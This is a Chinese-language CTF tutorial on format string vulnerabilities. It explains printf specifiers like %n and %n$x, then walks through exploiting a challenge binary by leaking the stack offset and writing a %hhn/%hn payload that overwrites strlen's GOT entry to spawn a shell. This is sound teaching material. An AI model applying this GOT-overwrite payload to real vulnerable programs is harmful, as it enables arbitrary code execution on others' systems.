<!doctype html><html><head><meta charset='utf-8'>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/github-markdown-css/2.4.1/github-markdown.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/default.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.6.0/katex.min.css">
<link rel="stylesheet" href="https://gitcdn.xyz/repo/goessner/mdmath/master/css/mdmath.css">
</head><body class="markdown-body">
<h1>格式化字符串漏洞</h1>
<h2>0.一个坑爹的问题</h2>
<p>这个问题与主题没太大关系，还是提一提吧<br>
在ubuntu16.10后gcc编译时默认加上了参数<code>-pie</code>，也就是运行地址随机化，可以更好的抵挡攻击，防pwn，但是出题就比较坑爹了<br>
只需要编译时加上参数<code>-no-pie</code>即可</p>
<h2>1. 格式化字符串简介</h2>
<blockquote>
<p>格式化字符串，是一些程序设计语言在格式化输出API函数中用于指定输出参数的格式与相对位置的字符串参数，例如C、C++等程序设计语言的printf类函数，其中的转换说明（conversion specification）用于把随后对应的0个或多个函数参数转换为相应的格式输出；格式化字符串中转换说明以外的其它字符原样输出。</p>
</blockquote>
<p>以上摘自wiki:<a href="https://zh.wikipedia.org/wiki/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2">格式化字符串</a><br>
为了格式化字符串，需要使用占位符用于指明输出的参数值如何格式化。<br>
在c语言中的printf这一大类函数中（包括vprintf，sprintf等），使用%d,%c,%s等占位符对字符串进行格式化<br>
然而，一些特殊的用法往往被人们忽略了</p>
<ul>
<li>控制输出长度<br>
<code>%nx</code>表示按16进制输出，不足n位的话在字符串前面补空格<br>
<code>%0nx</code>表示按16进制输出，不足n位的话在字符串前面补空格<br>
其它占位符同理</li>
<li>指定参数<br>
<code>%n$x</code>表示把第n个参数按16进制输出<br>
注：<br>
a. 指定参数可以与控制输出长度结合使用，如<code>%n$08x</code><br>
b. 指定参数不影响正常的输出，若执行<code>printf(&quot;%3$d.%d.%d.%d&quot;, 1, 2, 3);</code>，则输出3.1.2.3<br>
c.在x86下指定参数时printf认为每个参数的长度为4字节，所以在碰上<code>long long</code>这样8字节或者更多的参数时，指定参数可能会出错，需要具体情况具体分析</li>
<li>保存输出字符的个数
可使用%n保存输出字符的个数到变量中<br>
<code>printf(&quot;1234%n&quot;, &amp;a)</code><br>
由于输出了4个字符，将4写入a
注:<br>
a.可以与指定参数结合使用<br>
b.后面的参数为变量的地址，而不是变量的本身（好像是废话）</li>
</ul>
<h2>2.漏洞原因</h2>
<p>在c语言中，往往有输出字符串的场景，当输出一个字符串的一般写法为</p>
<pre class="hljs"><code><div><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, str);
</div></code></pre>
<p>当一些程序员偷懒后就成为了</p>
<pre class="hljs"><code><div><span class="hljs-built_in">printf</span>(str);
</div></code></pre>
<p>若是攻击者掌握了字符串，那么可以利用1中的特殊用法，对你的程序做一些奇怪的事情，从而pwn掉你的程序</p>
<h2>3.利用</h2>
<p>由1可知道，%n可以写入数据，%nc等用法可以控制输出字符的长度从而控制数据的数值，结合指定参数，便可以对4字节内存进行读写<br>
下面以一个题为例来说明<br>
丢进ida后明显可以看到</p>
<pre class="hljs"><code><div>read(<span class="hljs-number">0</span>, str, <span class="hljs-number">1023</span>);
<span class="hljs-built_in">puts</span>(<span class="hljs-string">"Haha, your input is:"</span>);
<span class="hljs-built_in">printf</span>(str);
</div></code></pre>
<p>明显的一个格式化字符串漏洞<br>
又看到</p>
<pre class="hljs"><code><div><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">getflag</span><span class="hljs-params">()</span>
</span>{
    system(<span class="hljs-string">"/bin/sh"</span>);
}
</div></code></pre>
<p>发现没有地方调用getflag，考虑修改got表将下面的strlen的函数地址改为getflag的地址（其实不给getflag函数也可以做到，先考虑简单情况）。<br>
首先先查询str相当于printf的第几个参数<br>
命令中输入</p>
<pre class="hljs"><code><div>(python -c <span class="hljs-string">"print('aaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x')"</span>;)|./repeat
</div></code></pre>
<p>执行后结果为<br>
<img src="img/1.png" alt=""><br>
a对应的16进制ascii码为<code>61</code>，由此可以看出第4个参数为str<br>
执行下列语句</p>
<pre class="hljs"><code><div>(python -c <span class="hljs-string">"print('aaaa.%4<span class="hljs-variable">$08x</span>')"</span>;)|./repeat
</div></code></pre>
<p>结果为<br>
<img src="img/2.png" alt=""><br>
验证自己的语句为正确的<br>
注:</p>
<ol>
<li>在python中$需要使用\进行转义输出，应为<code>$</code></li>
<li>python3全体都是unicode，对于一些不可见字符的处理存在问题，故使用python进行操作</li>
</ol>
<p>打开终端，输入</p>
<pre class="hljs"><code><div>readelf -r repeat | grep strlen
</div></code></pre>
<p>结果为<br>
<code>0804a01c 00000607 R_386_JUMP_SLOT 00000000 strlen@GLIBC_2.0</code><br>
可以看出strlen在got表中的位置为<code>0x0804a01c</code><br>
注:</p>
<ol>
<li>readelf命令可以查看elf文件信息，-r表示显示可重定位段的信息</li>
<li>程序执行动态链接库的函数时，先跳转到plt表，然后跳转到got表</li>
</ol>
<p>ida可以看到下图<br>
<img src="img/3.png" alt=""><br>
可以得知getflag的地址为<code>0x0804853b</code></p>
<p>接下来构造字符串更改strlen函数地址即可<br>
输入如下命令</p>
<pre class="hljs"><code><div>(python -c <span class="hljs-string">"print('\x1c\xa0\x04\x08\x1d\xa0\x04\x08\x1e\xa0\x04\x08%47c%4<span class="hljs-variable">$hhn</span>%74c%5<span class="hljs-variable">$hhn</span>%1919c%6<span class="hljs-variable">$hn</span>')"</span>;cat) | ./repeat
</div></code></pre>
<p>即拿到shell<br>
注:</p>
<ol>
<li>%n写入4字节，%hn写入2字节，%hhn写入1字节</li>
<li>由于需要写入<code>0x0804853b</code>，数据过大，分成三次写入，分别写入0x3b， 0x85, 0x0804（否则会输出时间过长，甚至段错误）</li>
<li>后面的数值可以自己计算，写入0x3b就应该保证前面输出了0x3b个字符，由于前面已经输出了12个字符，剩下只需要再输出0x3b - 12 = 47个字符。在需要写入0x85时只需要再输出0x85 - 0x3b = 74个字符，下面的同理</li>
</ol>

</body></html>
